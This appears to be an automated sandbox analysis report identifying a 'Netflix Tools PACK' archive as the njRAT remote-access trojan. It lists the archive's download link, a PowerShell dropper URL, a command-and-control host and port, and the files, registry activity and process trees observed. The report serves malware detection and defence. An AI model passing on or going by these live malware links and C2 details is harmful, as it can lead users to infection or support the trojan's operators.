njrat | hxxps://anonfiles[.]com/ffO7Aaw1w5/Netflix_Tools_PACK_rar

Analysis

max time kernel
112s
max time network
107s
platform
windows10_x64
resource
win10-en-20211208
submitted
20-12-2021 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://anonfiles.com/ffO7Aaw1w5/Netflix_Tools_PACK_rar

Score

10^/10

njrat pc_evasion trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Extracted

Family

njrat

Version

0.7d

Botnet

PC_

hccr.sytes.net:1411

Mutex

460557edf4b4cbfb08eadcebcbd28364

Attributes

reg_key
460557edf4b4cbfb08eadcebcbd28364
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Executes dropped EXE 5 IoCs

Processes:

GoldFlix Checker.exeLauncher.exegfsys.exeNetflix by GOD Cracked By GM`ka.exeLauncher.exe

pid process

1464 GoldFlix Checker.exe
3592 Launcher.exe
1068 gfsys.exe
2596 Netflix by GOD Cracked By GM`ka.exe
3956 Launcher.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 2 IoCs

Processes:

Launcher.exe

pid process

3592 Launcher.exe
3592 Launcher.exe

pid	process
1464	GoldFlix Checker.exe
3592	Launcher.exe
1068	gfsys.exe
2596	Netflix by GOD Cracked By GM`ka.exe
3956	Launcher.exe

pid	process
3592	Launcher.exe
3592	Launcher.exe

Drops desktop.ini file(s) 24 IoCs

Processes:

7zG.exechrome.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\NetFlix GC Checker by xRisky\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker v0.2.1\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Virus Total\desktop.ini	chrome.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker v0.2.1\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\GoldFlix GC Netflix Checker\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Virus Total\desktop.ini	7zG.exe
File created	C:\Users\Admin\Downloads\Netflix Tools PACK\GoldFlix GC Netflix Checker\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\NetFlix GC Checker by xRisky\Virus Total\desktop.ini	7zG.exe
File opened for modification	C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Virus Total\desktop.ini	7zG.exe

Drops file in Program Files directory 64 IoCs

Processes:

chrome.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 15-01-51\+Games.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 15-12-57\Bad.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\Virus Total\scan.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\MetroSuite 2.0.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\HtmlAgilityPack.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Newtonsoft.Json.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix Checker by xRisky v2\NetFlix Checker by xRisky v2.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\Launcher.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\Launcher.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 15-17-20\+Games.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\LICENCE.dat	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 14-47-16\Bad.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 31-10-19 23-49-04\Bad.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\NetFlix GC Checker by xRisky.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\ttdinject.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\msvcr100.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 13-42-40\Good_Hits.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Ionic.Zip.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\Leaf.xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\bcastdvr.proxy.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\msacm32.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\Team-Otimus V3.0\eappcfg.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\HtmlAgilityPack.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\License.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Launcher.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\License.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\MetroSuite 2.0.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Guna.UI.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\LICENCE.dat	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\MetroSuite 2.0.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\AntiCaptcha.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 14-47-16\+Games.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\Leaf.xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Netflix by Rubicon.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Launcher.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\bcastdvr.proxy.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Launcher.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v1 by Sh4lltear\sysdll\Sh4lltear.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\Results\hits.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\nsi\Ionic.Zip.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\MetroSuite 2.0.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker Shitter By Team-Otimus V3.0\NetFlix_Shitter_V3.0_By_Team-Otimus-protected_Protected.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 15-41-08\+Games.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\Gen\LICENCE.dat	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 15-41-08\Bad.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker V3.1 by Cetrix\sysdll\Ionic.Zip.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Ionic.Zip.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\NetFlix GC Checker by xRisky\data\Leaf.xNet.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Virus Total\desktop.ini	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\Netflix by GOD Cracked By GM`ka.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Microsoft.VC100.CRT\sys.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 16-26-01\+Games.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 16-26-01\Bad.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix GC Generator By SpaceXVIII\codes.txt	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix password changer + capture by RubiconT\Newtonsoft.Json.dll	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\GoldFlix GC Netflix Checker\GoldFlix Checker.exe	chrome.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Netflix Tools PACK\Netflix Checker v0.2.1\Results\Result 01-11-19 14-29-12\Bad.txt	chrome.exe

Drops file in Windows directory 9 IoCs

Processes:

Launcher.exe

description	ioc	process
File created	C:\Windows\IMF\LICENCE.zip	Launcher.exe
File opened for modification	C:\Windows\IMF\LICENCE.zip	Launcher.exe
File created	C:\Windows\IMF\LICENCE.dat	Launcher.exe
File created	C:\Windows\IMF\Runtime Explorer.exe.tmp	Launcher.exe
File created	C:\Windows\IMF\Windows Services.exe.tmp	Launcher.exe
File opened for modification	C:\Windows\IMF\Runtime Explorer.exe	Launcher.exe
File created	C:\Windows\IMF\Secure System Shell.exe.tmp	Launcher.exe
File opened for modification	C:\Windows\IMF\Secure System Shell.exe	Launcher.exe
File opened for modification	C:\Windows\IMF\Windows Services.exe	Launcher.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe	nsis_installer_1
C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe	nsis_installer_2
C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe	nsis_installer_1
C:\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe	nsis_installer_2

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeLauncher.exepowershell.exe

pid	process
1064	chrome.exe
1064	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2116	chrome.exe
2116	chrome.exe
1504	chrome.exe
1504	chrome.exe
1216	chrome.exe
1216	chrome.exe
1100	chrome.exe
1100	chrome.exe
3592	Launcher.exe
868	powershell.exe
868	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

chrome.exe

pid process

2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe
2828 chrome.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

7zG.exeLauncher.exepowershell.exe

description	pid	process
Token: SeRestorePrivilege	4024	7zG.exe
Token: 35	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeDebugPrivilege	3592	Launcher.exe
Token: SeDebugPrivilege	868	powershell.exe

Suspicious use of FindShellTrayWindow 56 IoCs

Processes:

chrome.exe7zG.exe

pid	process
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
4024	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe
2828	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2828 wrote to memory of 2840	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 2840	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 928	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 1064	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 1064	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe
PID 2828 wrote to memory of 3752	2828	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://anonfiles.com/ffO7Aaw1w5/Netflix_Tools_PACK_rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xcc,0xdc,0x7ffa2ed14f50,0x7ffa2ed14f60,0x7ffa2ed14f70
2⤵
PID:2840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1500 /prefetch:2
2⤵
PID:928

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1852 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:8
2⤵
PID:3752

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
2⤵
PID:3576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2944 /prefetch:1
2⤵
PID:3696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4140 /prefetch:8
2⤵
PID:1108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1484,15061200548682030354,13176889942030988033,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
2⤵
PID:988
